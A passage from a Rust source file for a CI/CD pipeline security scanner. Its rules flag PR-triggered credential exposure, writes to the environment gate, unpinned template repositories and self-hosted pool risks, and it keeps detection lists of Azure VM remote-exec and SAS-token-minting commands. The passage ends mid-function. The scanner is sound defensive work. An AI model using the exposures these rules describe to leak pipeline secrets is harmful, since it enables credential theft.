978        source: FindingSource::BuiltIn,
979        extras: FindingExtras::default(),
980}]
981}
982
983/// Rule: privileged workflow (OIDC/federated identity) with no provenance attestation step.
984///
985/// Scoped to workflows that actually use OIDC/federated identity (an Identity node with
986/// `META_OIDC = "true"` is present). If no node in the graph has `META_ATTESTS = "true"`,
987/// emit one Info-severity finding listing the steps with HasAccessTo an OIDC identity.
988pub fn uplift_without_attestation(graph: &AuthorityGraph) -> Vec<Finding> {
989    // Scope: only fire when the graph has at least one OIDC-capable Identity
990    let oidc_identity_ids: Vec<NodeId> = graph
991        .nodes_of_kind(NodeKind::Identity)
992        .filter(|n| {
993            n.metadata
994                .get(META_OIDC)
995                .map(|v| v == "true")
996                .unwrap_or(false)
997        })
998        .map(|n| n.id)
999        .collect();
1000
1001    if oidc_identity_ids.is_empty() {
1002        return Vec::new();
1003    }
1004
1005    // Bail if any node already has META_ATTESTS = true
1006    let has_attestation = graph.nodes.iter().any(|n| {
1007        n.metadata
1008            .get(META_ATTESTS)
1009            .map(|v| v == "true")
1010            .unwrap_or(false)
1011    });
1012    if has_attestation {
1013        return Vec::new();
1014    }
1015
1016    // Collect steps that have HasAccessTo an OIDC identity
1017    let mut steps_using_oidc: Vec<NodeId> = Vec::new();
1018    for edge in &graph.edges {
1019        if edge.kind != EdgeKind::HasAccessTo {
1020            continue;
1021        }
1022        if oidc_identity_ids.contains(&edge.to) && !steps_using_oidc.contains(&edge.from) {
1023            steps_using_oidc.push(edge.from);
1024        }
1025    }
1026
1027    if steps_using_oidc.is_empty() {
1028        return Vec::new();
1029    }
1030
1031    let n = steps_using_oidc.len();
1032    let mut nodes_involved = steps_using_oidc.clone();
1033    nodes_involved.extend(oidc_identity_ids);
1034
1035    vec![Finding {
1036        severity: Severity::Info,
1037        category: FindingCategory::UpliftWithoutAttestation,
1038        path: None,
1039        nodes_involved,
1040        message: format!(
1041            "{n} step(s) use OIDC/federated identity but no provenance attestation step was detected — artifact integrity cannot be verified"
1042        ),
1043        recommendation: Recommendation::Manual {
1044            action: "Add 'actions/attest-build-provenance' after your build step (GHA) to provide SLSA provenance. See https://docs.github.com/en/actions/security-guides/using-artifact-attestations".into(),
1045        },
1046        source: FindingSource::BuiltIn,
1047        extras: FindingExtras::default(),
1048}]
1049}
1050
1051/// Rule: step writes to the environment gate ($GITHUB_ENV / ##vso[task.setvariable]).
1052///
1053/// Authority leaking through the environment gate propagates to subsequent steps
1054/// outside the explicit graph edges. Severity:
1055/// - Untrusted step: Critical (attacker-controlled values inject into pipeline env)
1056/// - Step with secret/identity access: High (secrets may leak into env)
1057/// - Otherwise: Medium (still a propagation risk)
1058pub fn self_mutating_pipeline(graph: &AuthorityGraph) -> Vec<Finding> {
1059    let mut findings = Vec::new();
1060
1061    for step in graph.nodes_of_kind(NodeKind::Step) {
1062        let writes_gate = step
1063            .metadata
1064            .get(META_WRITES_ENV_GATE)
1065            .map(|v| v == "true")
1066            .unwrap_or(false);
1067        if !writes_gate {
1068            continue;
1069        }
1070
1071        // Collect authority targets the step has HasAccessTo
1072        let authority_nodes: Vec<&_> = graph
1073            .edges_from(step.id)
1074            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1075            .filter_map(|e| graph.node(e.to))
1076            .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
1077            .collect();
1078
1079        let is_untrusted = step.trust_zone == TrustZone::Untrusted;
1080        let has_authority = !authority_nodes.is_empty();
1081
1082        let severity = if is_untrusted {
1083            Severity::Critical
1084        } else if has_authority {
1085            Severity::High
1086        } else {
1087            Severity::Medium
1088        };
1089
1090        let mut nodes_involved = vec![step.id];
1091        nodes_involved.extend(authority_nodes.iter().map(|n| n.id));
1092
1093        let message = if is_untrusted {
1094            format!(
1095                "Untrusted step '{}' writes to the environment gate — attacker-controlled values can inject into subsequent steps' environment",
1096                step.name
1097            )
1098        } else if has_authority {
1099            let authority_label: Vec<String> =
1100                authority_nodes.iter().map(|n| n.name.clone()).collect();
1101            format!(
1102                "Step '{}' writes to the environment gate while holding authority ({}) — secrets may leak into pipeline environment",
1103                step.name,
1104                authority_label.join(", ")
1105            )
1106        } else {
1107            format!(
1108                "Step '{}' writes to the environment gate — values can propagate into subsequent steps' environment",
1109                step.name
1110            )
1111        };
1112
1113        findings.push(Finding {
1114            severity,
1115            category: FindingCategory::SelfMutatingPipeline,
1116            path: None,
1117            nodes_involved,
1118            message,
1119            recommendation: Recommendation::Manual {
1120                action: "Avoid writing secrets or attacker-controlled values to $GITHUB_ENV / $GITHUB_PATH / pipeline variables. Use explicit step outputs with narrow scoping instead.".into(),
1121            },
1122            source: FindingSource::BuiltIn,
1123                extras: FindingExtras::default(),
1124});
1125    }
1126
1127    findings
1128}
1129
1130/// Rule: PR-triggered pipeline performs a self checkout.
1131///
1132/// When a PR/PRT-triggered pipeline checks out the repository, attacker-controlled
1133/// code from the fork lands on the runner. Any subsequent step that reads workspace
1134/// files (which is almost all of them) can exfiltrate secrets or tamper with build
1135/// artifacts. Fires only when the graph has a PR-class trigger.
1136pub fn checkout_self_pr_exposure(graph: &AuthorityGraph) -> Vec<Finding> {
1137    // Only fires when the graph has a PR/PRT trigger
1138    let trigger = graph.metadata.get(META_TRIGGER).map(|s| s.as_str());
1139    let is_pr_context = matches!(trigger, Some("pr") | Some("pull_request_target"));
1140    if !is_pr_context {
1141        return vec![];
1142    }
1143
1144    let mut findings = Vec::new();
1145    for step in graph.nodes_of_kind(NodeKind::Step) {
1146        let is_checkout_self = step
1147            .metadata
1148            .get(META_CHECKOUT_SELF)
1149            .map(|v| v == "true")
1150            .unwrap_or(false);
1151        if !is_checkout_self {
1152            continue;
1153        }
1154        findings.push(Finding {
1155            category: FindingCategory::CheckoutSelfPrExposure,
1156            severity: Severity::High,
1157            message: format!(
1158                "PR-triggered pipeline checks out the repository at step '{}' — \
1159                 attacker-controlled code from the fork lands on the runner and is \
1160                 readable by all subsequent steps",
1161                step.name
1162            ),
1163            path: None,
1164            nodes_involved: vec![step.id],
1165            recommendation: Recommendation::Manual {
1166                action: "Use `persist-credentials: false` and avoid reading workspace \
1167                         files in subsequent privileged steps. Consider `checkout: none` \
1168                         for jobs that only need pipeline config, not source code."
1169                    .into(),
1170            },
1171            source: FindingSource::BuiltIn,
1172            // Splitting privileged from PR-checkout jobs is a meaningful
1173            // restructure — Medium effort.
1174            extras: FindingExtras {
1175                time_to_fix: Some(crate::finding::FixEffort::Medium),
1176                ..FindingExtras::default()
1177            },
1178        });
1179    }
1180    findings
1181}
1182
1183/// Rule: ADO variable group consumed by a PR-triggered job.
1184///
1185/// Variable groups hold secrets scoped to pipelines. When a PR-triggered job has
1186/// `HasAccessTo` a Secret/Identity carrying `META_VARIABLE_GROUP = "true"`, those
1187/// secrets cross into an untrusted-contributor execution context.
1188pub fn variable_group_in_pr_job(graph: &AuthorityGraph) -> Vec<Finding> {
1189    // Only fires when the pipeline has a PR trigger
1190    let trigger = graph
1191        .metadata
1192        .get(META_TRIGGER)
1193        .map(|s| s.as_str())
1194        .unwrap_or("");
1195    if trigger != "pull_request_target" && trigger != "pr" {
1196        return Vec::new();
1197    }
1198
1199    let mut findings = Vec::new();
1200
1201    for step in graph.nodes_of_kind(NodeKind::Step) {
1202        let accessed_var_groups: Vec<&_> = graph
1203            .edges_from(step.id)
1204            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1205            .filter_map(|e| graph.node(e.to))
1206            .filter(|n| {
1207                (n.kind == NodeKind::Secret || n.kind == NodeKind::Identity)
1208                    && n.metadata
1209                        .get(META_VARIABLE_GROUP)
1210                        .map(|v| v == "true")
1211                        .unwrap_or(false)
1212            })
1213            .collect();
1214
1215        if !accessed_var_groups.is_empty() {
1216            let group_names: Vec<_> = accessed_var_groups
1217                .iter()
1218                .map(|n| n.name.as_str())
1219                .collect();
1220            findings.push(Finding {
1221                severity: Severity::Critical,
1222                category: FindingCategory::VariableGroupInPrJob,
1223                path: None,
1224                nodes_involved: std::iter::once(step.id)
1225                    .chain(accessed_var_groups.iter().map(|n| n.id))
1226                    .collect(),
1227                message: format!(
1228                    "PR-triggered step '{}' accesses variable group(s) [{}] — secrets cross into untrusted PR execution context",
1229                    step.name,
1230                    group_names.join(", ")
1231                ),
1232                recommendation: Recommendation::CellosRemediation {
1233                    reason: format!(
1234                        "PR-triggered step '{}' can exfiltrate variable group secrets via untrusted code",
1235                        step.name
1236                    ),
1237                    spec_hint: "cellos run --network deny-all --policy requireEgressDeclared,requireRuntimeSecretDelivery".into(),
1238                },
1239                source: FindingSource::BuiltIn,
1240                        extras: FindingExtras::default(),
1241});
1242        }
1243    }
1244
1245    findings
1246}
1247
1248/// Rule: self-hosted agent pool used by a PR-triggered pipeline that also checks out the repo.
1249///
1250/// All three factors present — self-hosted pool + PR trigger + `checkout:self` — combine to
1251/// allow an attacker to land malicious git hooks on the shared runner via a PR. Those hooks
1252/// persist across pipeline runs and execute with full pipeline authority.
1253pub fn self_hosted_pool_pr_hijack(graph: &AuthorityGraph) -> Vec<Finding> {
1254    let trigger = graph
1255        .metadata
1256        .get(META_TRIGGER)
1257        .map(|s| s.as_str())
1258        .unwrap_or("");
1259    if trigger != "pull_request_target" && trigger != "pr" {
1260        return Vec::new();
1261    }
1262
1263    // Check if any Image node is self-hosted
1264    let has_self_hosted_pool = graph.nodes_of_kind(NodeKind::Image).any(|n| {
1265        n.metadata
1266            .get(META_SELF_HOSTED)
1267            .map(|v| v == "true")
1268            .unwrap_or(false)
1269    });
1270
1271    if !has_self_hosted_pool {
1272        return Vec::new();
1273    }
1274
1275    // Check if any Step does checkout:self
1276    let checkout_steps: Vec<&_> = graph
1277        .nodes_of_kind(NodeKind::Step)
1278        .filter(|n| {
1279            n.metadata
1280                .get(META_CHECKOUT_SELF)
1281                .map(|v| v == "true")
1282                .unwrap_or(false)
1283        })
1284        .collect();
1285
1286    if checkout_steps.is_empty() {
1287        return Vec::new();
1288    }
1289
1290    // All three factors present: self-hosted + PR trigger + checkout:self.
1291    // Collect self-hosted pool nodes for the finding.
1292    let pool_nodes: Vec<&_> = graph
1293        .nodes_of_kind(NodeKind::Image)
1294        .filter(|n| {
1295            n.metadata
1296                .get(META_SELF_HOSTED)
1297                .map(|v| v == "true")
1298                .unwrap_or(false)
1299        })
1300        .collect();
1301
1302    let mut nodes_involved: Vec<NodeId> = pool_nodes.iter().map(|n| n.id).collect();
1303    nodes_involved.extend(checkout_steps.iter().map(|n| n.id));
1304
1305    vec![Finding {
1306        severity: Severity::Critical,
1307        category: FindingCategory::SelfHostedPoolPrHijack,
1308        path: None,
1309        nodes_involved,
1310        message:
1311            "PR-triggered pipeline uses self-hosted agent pool with checkout:self — enables git hook injection persisting across pipeline runs on the shared runner"
1312                .into(),
1313        recommendation: Recommendation::Manual {
1314            action: "Run PR pipelines on Microsoft-hosted (ephemeral) agents, or disable checkout:self for PR-triggered jobs on self-hosted pools".into(),
1315        },
1316        source: FindingSource::BuiltIn,
1317        extras: FindingExtras::default(),
1318}]
1319}
1320
1321// ── shared_self_hosted_pool_no_isolation ──────────────────────────────────────
1322//
1323// ADO self-hosted agent pools retain their workspace between pipeline runs.
1324// Without `workspace: { clean: all }` a build that runs on the shared agent
1325// can leave behind malicious files, compiled artefacts, or git hooks that
1326// persist for the next run — which may be a privileged deployment pipeline.
1327//
1328// Microsoft-hosted agents are ephemeral (Image node has no META_SELF_HOSTED).
1329
1330/// Rule G1: ADO self-hosted pool without workspace isolation.
1331///
1332/// Fires when any Image node (pool) in an ADO pipeline has `META_SELF_HOSTED`
1333/// set but does NOT have `META_WORKSPACE_CLEAN` set.  Microsoft-hosted pools
1334/// are ephemeral and are never flagged.
1335pub fn shared_self_hosted_pool_no_isolation(graph: &AuthorityGraph) -> Vec<Finding> {
1336    let platform = graph.metadata.get(META_PLATFORM).map(|s| s.as_str());
1337    if platform != Some("azure-devops") {
1338        return Vec::new();
1339    }
1340
1341    let mut findings = Vec::new();
1342
1343    for pool in graph.nodes_of_kind(NodeKind::Image) {
1344        let is_self_hosted = pool
1345            .metadata
1346            .get(META_SELF_HOSTED)
1347            .map(|v| v == "true")
1348            .unwrap_or(false);
1349
1350        if !is_self_hosted {
1351            continue;
1352        }
1353
1354        let has_clean = pool
1355            .metadata
1356            .get(META_WORKSPACE_CLEAN)
1357            .map(|v| v == "true")
1358            .unwrap_or(false);
1359
1360        if has_clean {
1361            continue;
1362        }
1363
1364        findings.push(Finding {
1365            severity: Severity::High,
1366            category: FindingCategory::SharedSelfHostedPoolNoIsolation,
1367            path: None,
1368            nodes_involved: vec![pool.id],
1369            message: format!(
1370                "Self-hosted pool '{}' has no workspace isolation (workspace: {{clean: all/true}} not set); \
1371                a previous pipeline run can pollute the workspace for the next — including privileged deployment jobs",
1372                pool.name
1373            ),
1374            recommendation: Recommendation::Manual {
1375                action: "Add `workspace: { clean: all }` to every job that uses a self-hosted pool, \
1376                    or migrate to Microsoft-hosted (ephemeral) agents for untrusted builds.".into(),
1377            },
1378            source: FindingSource::BuiltIn,
1379            extras: FindingExtras::default(),
1380        });
1381    }
1382
1383    findings
1384}
1385
1386/// Rule: ADO service connection with broad/unknown scope and no OIDC federation,
1387/// reachable from a PR-triggered job.
1388///
1389/// Static credentials backing broad-scope service connections can carry
1390/// subscription-wide Azure RBAC. When a PR-triggered step has `HasAccessTo` one of
1391/// these, PR-author-controlled code can move laterally into the Azure tenant.
1392pub fn service_connection_scope_mismatch(graph: &AuthorityGraph) -> Vec<Finding> {
1393    let trigger = graph
1394        .metadata
1395        .get(META_TRIGGER)
1396        .map(|s| s.as_str())
1397        .unwrap_or("");
1398    if trigger != "pull_request_target" && trigger != "pr" {
1399        return Vec::new();
1400    }
1401
1402    let mut findings = Vec::new();
1403
1404    for step in graph.nodes_of_kind(NodeKind::Step) {
1405        let broad_scs: Vec<&_> = graph
1406            .edges_from(step.id)
1407            .filter(|e| e.kind == EdgeKind::HasAccessTo)
1408            .filter_map(|e| graph.node(e.to))
1409            .filter(|n| {
1410                n.kind == NodeKind::Identity
1411                    && n.metadata
1412                        .get(META_SERVICE_CONNECTION)
1413                        .map(|v| v == "true")
1414                        .unwrap_or(false)
1415                    && n.metadata
1416                        .get(META_OIDC)
1417                        .map(|v| v != "true")
1418                        .unwrap_or(true) // not OIDC-federated
1419                    && matches!(
1420                        n.metadata.get(META_IDENTITY_SCOPE).map(|s| s.as_str()),
1421                        Some("broad") | Some("Broad") | None // unknown scope is also a risk
1422                    )
1423            })
1424            .collect();
1425
1426        for sc in &broad_scs {
1427            findings.push(Finding {
1428                severity: Severity::High,
1429                category: FindingCategory::ServiceConnectionScopeMismatch,
1430                path: None,
1431                nodes_involved: vec![step.id, sc.id],
1432                message: format!(
1433                    "PR-triggered step '{}' accesses service connection '{}' with broad/unknown scope and no OIDC federation — static credential may have subscription-wide Azure RBAC",
1434                    step.name, sc.name
1435                ),
1436                recommendation: Recommendation::CellosRemediation {
1437                    reason: "Broad-scope service connection reachable from PR code — CellOS egress isolation limits lateral movement even when connection cannot be immediately rescoped".into(),
1438                    spec_hint: "cellos run --network deny-all --policy requireEgressDeclared".into(),
1439                },
1440                source: FindingSource::BuiltIn,
1441                        extras: FindingExtras::default(),
1442});
1443        }
1444    }
1445
1446    findings
1447}
1448
1449/// ADO-only rule: a `resources.repositories[]` entry resolves against a
1450/// mutable target — no `ref:` field (default branch) or `refs/heads/<x>`
1451/// without a SHA. Whoever owns that branch can inject steps into every
1452/// consuming pipeline at the next run.
1453///
1454/// Pinned forms that do NOT fire:
1455///   - `refs/tags/<x>` — git tags (treated as immutable in practice)
1456///   - bare 40-char hex SHA — explicit commit pin
1457///   - `refs/heads/<sha>` where the trailing segment is a 40-char hex SHA
1458///
1459/// Mutable forms that DO fire:
1460///   - field absent — defaults to the repo's default branch
1461///   - `refs/heads/<branch>` with a normal branch name
1462///   - bare branch name (`main`, `master`, `develop`, ...)
1463///
1464/// Suppression: a repository entry declared with NO `ref:` field AND no
1465/// in-file consumer (`extends:`, `template: x@alias`, or `checkout: alias`)
1466/// is skipped. This catches purely vestigial declarations — a leftover
1467/// `resources.repositories[]` entry that no one references is not an active
1468/// attack surface. An entry with an explicit `ref: refs/heads/<x>` always
1469/// fires regardless of in-file usage, because the explicit branch ref
1470/// signals an intent to consume (the consumer is typically in an included
1471/// template file outside the per-file scan boundary).
1472pub fn template_extends_unpinned_branch(graph: &AuthorityGraph) -> Vec<Finding> {
1473    let raw = match graph.metadata.get(META_REPOSITORIES) {
1474        Some(s) => s,
1475        None => return Vec::new(),
1476    };
1477    let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
1478        Ok(v) => v,
1479        Err(_) => return Vec::new(),
1480    };
1481
1482    let mut findings = Vec::new();
1483    for entry in entries {
1484        let alias = match entry.get("alias").and_then(|v| v.as_str()) {
1485            Some(a) => a,
1486            None => continue,
1487        };
1488        let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
1489        let repo_type = entry
1490            .get("repo_type")
1491            .and_then(|v| v.as_str())
1492            .unwrap_or("git");
1493        let ref_value = entry.get("ref").and_then(|v| v.as_str());
1494        let used = entry.get("used").and_then(|v| v.as_bool()).unwrap_or(false);
1495
1496        let classification = classify_repository_ref(ref_value);
1497        let resolved = match classification {
1498            RepositoryRefClass::Pinned => continue,
1499            RepositoryRefClass::DefaultBranch => {
1500                // Default-branch entries are only flagged when an in-file
1501                // consumer actually references the alias. Without an explicit
1502                // `ref:` and without a consumer there's no evidence the
1503                // declaration is active — likely vestigial.
1504                if !used {
1505                    continue;
1506                }
1507                "default branch (no ref:)".to_string()
1508            }
1509            RepositoryRefClass::MutableBranch(b) => format!("mutable branch '{b}'"),
1510        };
1511
1512        let pinned_example = format!("ref: <40-char-sha>  # commit on {name}");
1513        findings.push(Finding {
1514            severity: Severity::High,
1515            category: FindingCategory::TemplateExtendsUnpinnedBranch,
1516            path: None,
1517            nodes_involved: Vec::new(),
1518            message: format!(
1519                "ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) resolves to {resolved} — \
1520                 whoever owns that branch can inject steps at the next pipeline run"
1521            ),
1522            recommendation: Recommendation::PinAction {
1523                current: ref_value.unwrap_or("(default branch)").to_string(),
1524                pinned: pinned_example,
1525            },
1526            source: FindingSource::BuiltIn,
1527                extras: FindingExtras::default(),
1528});
1529    }
1530
1531    findings
1532}
1533
1534/// ADO-only rule: a `resources.repositories[]` entry pins to a *feature-class*
1535/// branch — anything outside the platform-blessed set
1536/// (`main`, `master`, `release/*`, `hotfix/*`).
1537///
1538/// Strictly stronger signal than [`template_extends_unpinned_branch`]:
1539///
1540/// * `template_extends_unpinned_branch` fires on *any* mutable branch ref
1541///   (including `main` and `master`) — the abstract "ref isn't pinned to a
1542///   SHA or tag" finding.
1543/// * This rule fires only on the subset that's *worse than main*: a developer
1544///   feature branch (`feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
1545///   `develop`, …) where push protection is typically weaker than the trunk.
1546///
1547/// The two findings co-fire intentionally — they describe different angles of
1548/// the same risk class. `template_extends_unpinned_branch` says "this isn't
1549/// pinned"; this rule adds "and the branch it points to is one any developer
1550/// can push to without a code review gate".
1551///
1552/// Detection inputs are identical to `template_extends_unpinned_branch`:
1553/// `META_REPOSITORIES` JSON array, with the same `used` suppression for
1554/// `ref`-absent entries.
1555///
1556/// Pinned forms (40-char SHA, `refs/tags/<x>`, `refs/heads/<sha>`) do not
1557/// fire — same classification helper as the parent rule.
1558///
1559/// Default-branch (no-`ref:`) entries do not fire from this rule. The default
1560/// branch is conventionally `main`/`master`, and even when it's something
1561/// else the *implicit* default-branch contract carries less risk than an
1562/// explicit feature-branch pin (the default branch usually has the strongest
1563/// protection in the org). The plain "this isn't pinned" surface is left to
1564/// `template_extends_unpinned_branch`.
1565pub fn template_repo_ref_is_feature_branch(graph: &AuthorityGraph) -> Vec<Finding> {
1566    let raw = match graph.metadata.get(META_REPOSITORIES) {
1567        Some(s) => s,
1568        None => return Vec::new(),
1569    };
1570    let entries: Vec<serde_json::Value> = match serde_json::from_str(raw) {
1571        Ok(v) => v,
1572        Err(_) => return Vec::new(),
1573    };
1574
1575    let mut findings = Vec::new();
1576    for entry in entries {
1577        let alias = match entry.get("alias").and_then(|v| v.as_str()) {
1578            Some(a) => a,
1579            None => continue,
1580        };
1581        let name = entry.get("name").and_then(|v| v.as_str()).unwrap_or(alias);
1582        let repo_type = entry
1583            .get("repo_type")
1584            .and_then(|v| v.as_str())
1585            .unwrap_or("git");
1586        let ref_value = entry.get("ref").and_then(|v| v.as_str());
1587
1588        // Only explicit refs are candidates here — the parent rule covers the
1589        // ref-absent case via the default-branch path.
1590        let branch = match classify_repository_ref(ref_value) {
1591            RepositoryRefClass::MutableBranch(b) => b,
1592            RepositoryRefClass::Pinned | RepositoryRefClass::DefaultBranch => continue,
1593        };
1594
1595        if !is_feature_class_branch(&branch) {
1596            continue;
1597        }
1598
1599        let pinned_example = format!("ref: <40-char-sha>  # commit on {name}");
1600        findings.push(Finding {
1601            severity: Severity::High,
1602            category: FindingCategory::TemplateRepoRefIsFeatureBranch,
1603            path: None,
1604            nodes_involved: Vec::new(),
1605            message: format!(
1606                "ADO resources.repositories alias '{alias}' (type: {repo_type}, name: {name}) is pinned to feature-class branch '{branch}' — \
1607                 weaker than even an unpinned trunk pin: any developer with write access to that branch can inject pipeline steps without a code review on main"
1608            ),
1609            recommendation: Recommendation::PinAction {
1610                current: ref_value.unwrap_or("(default branch)").to_string(),
1611                pinned: pinned_example,
1612            },
1613            source: FindingSource::BuiltIn,
1614                extras: FindingExtras::default(),
1615});
1616    }
1617
1618    findings
1619}
1620
1621/// Returns `true` for ADO branch names that are *not* part of the
1622/// platform-blessed trunk/release set. The blessed set:
1623///
1624///   - `main`, `master`
1625///   - `release/*`, `releases/*`
1626///   - `hotfix/*`, `hotfixes/*`
1627///
1628/// Everything else — `feature/*`, `topic/*`, `dev/*`, `wip/*`, `users/*`,
1629/// `develop`, ad-hoc names — is treated as feature-class.
1630///
1631/// Comparison is case-insensitive and prefix-stripped of any leading
1632/// `refs/heads/` (the [`classify_repository_ref`] caller already strips it,
1633/// but defensive normalisation keeps this helper standalone-testable).
1634fn is_feature_class_branch(branch: &str) -> bool {
1635    let normalised = branch
1636        .trim()
1637        .trim_start_matches("refs/heads/")
1638        .to_ascii_lowercase();
1639
1640    if normalised.is_empty() {
1641        return false;
1642    }
1643
1644    // Exact-match trunk names.
1645    if matches!(normalised.as_str(), "main" | "master") {
1646        return false;
1647    }
1648
1649    // Prefix-match release / hotfix branches (with or without trailing slash).
1650    const TRUNK_PREFIXES: &[&str] = &["release/", "releases/", "hotfix/", "hotfixes/"];
1651    for p in TRUNK_PREFIXES {
1652        if normalised == p.trim_end_matches('/') || normalised.starts_with(p) {
1653            return false;
1654        }
1655    }
1656
1657    true
1658}
1659
1660// ── Command-line credential leakage helpers ─────────────
1661//
1662// These two rules (`vm_remote_exec_via_pipeline_secret`,
1663// `short_lived_sas_in_command_line`) inspect inline script bodies stamped on
1664// Step nodes by the parser as `META_SCRIPT_BODY`. They are intentionally
1665// heuristic — the goal is reliable detection of the corpus pattern, not 100%
1666// false-positive cleanliness. They're allowed to co-fire on the same step:
1667// each describes a different angle of the same risk class.
1668
1669/// Names of the Azure VM remote-execution primitives we care about.
1670/// Match is case-insensitive on the script body.
1671const VM_REMOTE_EXEC_TOKENS: &[&str] = &[
1672    "set-azvmextension",
1673    "invoke-azvmruncommand",
1674    "az vm run-command",
1675    "az vm extension set",
1676];
1677
1678/// Substrings that indicate a SAS token has just been minted in this script.
1679/// Match is case-insensitive on the script body.
1680const SAS_MINT_TOKENS: &[&str] = &[
1681    "new-azstoragecontainersastoken",
1682    "new-azstorageblobsastoken",
1683    "new-azstorageaccountsastoken",
1684    "az storage container generate-sas",
1685    "az storage blob generate-sas",
1686    "az storage account generate-sas",
1687];
1688
1689/// Argument-passing keywords that put a value on the process command line and
1690/// thus into ARM extension status / OS process logs.
1691const COMMAND_LINE_SINK_TOKENS: &[&str] = &[
1692    "commandtoexecute",
1693    "scriptarguments",
1694    "--arguments",
1695    "-argumentlist",
1696    "--scripts",
1697    "-scriptstring",
1698];
1699
1700/// Returns the names of pipeline secret/SAS variables (`$(NAME)`) that the
1701/// step references via `HasAccessTo` a Secret. Used to spot interpolation of
1702/// pipeline secrets into command-line strings.
1703fn step_secret_var_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<&str> {
1704    graph
1705        .edges_from(step_id)
1706        .filter(|e| e.kind == EdgeKind::HasAccessTo)
1707        .filter_map(|e| graph.node(e.to))
1708        .filter(|n| n.kind == NodeKind::Secret)
1709        .map(|n| n.name.as_str())
1710        .collect()
1711}
1712
1713/// Returns the names of all Secret nodes a step has `HasAccessTo`.
1714/// Used by the script-aware ADO rules to constrain pattern matches to
1715/// `$(VAR)` references that actually resolve to secrets in this graph.
1716fn step_secret_names(graph: &AuthorityGraph, step_id: NodeId) -> Vec<String> {
1717    graph
1718        .edges_from(step_id)
1719        .filter(|e| e.kind == EdgeKind::HasAccessTo)
1720        .filter_map(|e| graph.node(e.to))
1721        .filter(|n| n.kind == NodeKind::Secret)
1722        .map(|n| n.name.clone())
1723        .collect()
1724}
1725
1726/// Heuristic: returns true if a value-bearing variable named `var_name` appears
1727/// to be interpolated into `script_body` (PowerShell `$var` / `"$var"` /
1728/// `` `"$var`" `` form, or ADO `$(var)` form). Case-insensitive.
1729fn body_interpolates_var(script_body: &str, var_name: &str) -> bool {
1730    if var_name.is_empty() {
1731        return false;
1732    }
1733    let body = script_body.to_lowercase();
1734    let name = var_name.to_lowercase();
1735    // ADO macro form
1736    let dollar_paren = format!("$({name})");
1737    if body.contains(&dollar_paren) {
1738        return true;
1739    }
1740    // PowerShell variable form: must be followed by a non-identifier char to
1741    // avoid matching `$varSomething` as `$var`.
1742    let needle = format!("${name}");
1743    let mut search_from = 0usize;
1744    while let Some(pos) = body[search_from..].find(&needle) {
1745        let abs = search_from + pos;
1746        let end = abs + needle.len();
1747        let next = body.as_bytes().get(end).copied();
1748        let is_word = matches!(next, Some(c) if c.is_ascii_alphanumeric() || c == b'_');
1749        if !is_word {
1750            return true;
1751        }
1752        search_from = end;
1753    }
1754    false
1755}
1756
1757/// Returns true if `script` contains `$(secret)` and that occurrence sits on
1758/// a line whose left-hand side looks like a shell-variable assignment:
1759///   - `export FOO=$(SECRET)`
1760///   - `FOO="$(SECRET)"`
1761///   - `$X = "$(SECRET)"` / `$env:X = "$(SECRET)"`
1762///   - `set -a` followed by an assignment is a softer signal but still flagged
1763///
1764/// Returns false when `$(secret)` is part of a command-line argument
1765/// (e.g. `terraform plan -var "k=$(SECRET)"`) — that's covered by other rules.
1766fn script_assigns_secret_to_shell_var(script: &str, secret: &str) -> bool {
1767    let needle = format!("$({secret})");
1768    for line in script.lines() {
1769        if !line.contains(&needle) {
1770            continue;
1771        }
1772        // Strip everything from `$(secret)` rightward — we only inspect what
1773        // comes before it on this line.
1774        let lhs = match line.find(&needle) {
1775            Some(pos) => &line[..pos],
1776            None => continue,
1777        };
1778        let trimmed = lhs.trim_start();
1779
1780        // bash/sh: `export VAR=`, `VAR=`, `set VAR=`, `declare VAR=`
1781        // Look for `<word>=` (no space allowed before `=`) and no leading
1782        // command pipe / non-assignment indicator.
1783        if matches_bash_assignment(trimmed) {
1784            return true;
1785        }
1786
1787        // PowerShell: `$VAR = "..."`, `$env:VAR = "..."`, `${VAR} = "..."`,
1788        // `Set-Variable -Name X -Value "$(SECRET)"`.
1789        if matches_powershell_assignment(trimmed) {
1790            return true;
1791        }
1792    }
1793    false
1794}
1795
1796/// Returns true if `body` contains any of the SAS-mint token substrings.
1797fn body_mints_sas(body_lower: &str) -> bool {
1798    SAS_MINT_TOKENS.iter().any(|t| body_lower.contains(t))
1799}
1800
1801/// Returns true if `body` contains any of the VM remote-exec tool substrings.
1802fn body_uses_vm_remote_exec(body_lower: &str) -> bool {
1803    VM_REMOTE_EXEC_TOKENS.iter().any(|t| body_lower.contains(t))
1804}
1805
1806/// Returns true if `body` contains any command-line sink keyword.
1807fn body_has_cmdline_sink(body_lower: &str) -> bool {
1808    COMMAND_LINE_SINK_TOKENS
1809        .iter()
1810        .any(|t| body_lower.contains(t))
1811}
1812
1813/// Extract names of PowerShell variables that are bound to a SAS-mint result.
1814/// Pattern: `$<name> = New-AzStorage...SASToken ...` (case-insensitive).
1815/// Returns the variable names without the leading `$`.
1816fn powershell_sas_assignments(body: &str) -> Vec<String> {
1817    let mut out = Vec::new();
1818    let lower = body.to_lowercase();
1819    let bytes = lower.as_bytes();
1820    let mut i = 0usize;
1821    while i < bytes.len() {
1822        if bytes[i] != b'$' {
1823            i += 1;
1824            continue;
1825        }
1826        // Read identifier
1827        let name_start = i + 1;
1828        let mut j = name_start;
1829        while j < bytes.len() {
1830            let c = bytes[j];
1831            if c.is_ascii_alphanumeric() || c == b'_' {
1832                j += 1;
1833            } else {
1834                break;
1835            }
1836        }
1837        if j == name_start {
1838            i += 1;
1839            continue;
1840        }
1841        // Skip whitespace, then expect `=`
1842        let mut k = j;
1843        while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
1844            k += 1;
1845        }
1846        if k >= bytes.len() || bytes[k] != b'=' {
1847            i = j;
1848            continue;
1849        }
1850        // Skip `=` and whitespace
1851        k += 1;
1852        while k < bytes.len() && (bytes[k] == b' ' || bytes[k] == b'\t') {
1853            k += 1;
1854        }
1855        // Look at the rest of this logical line (until `\n`).
1856        let line_end = lower[k..].find('\n').map(|p| k + p).unwrap_or(bytes.len());
1857        let rhs = &lower[k..line_end];
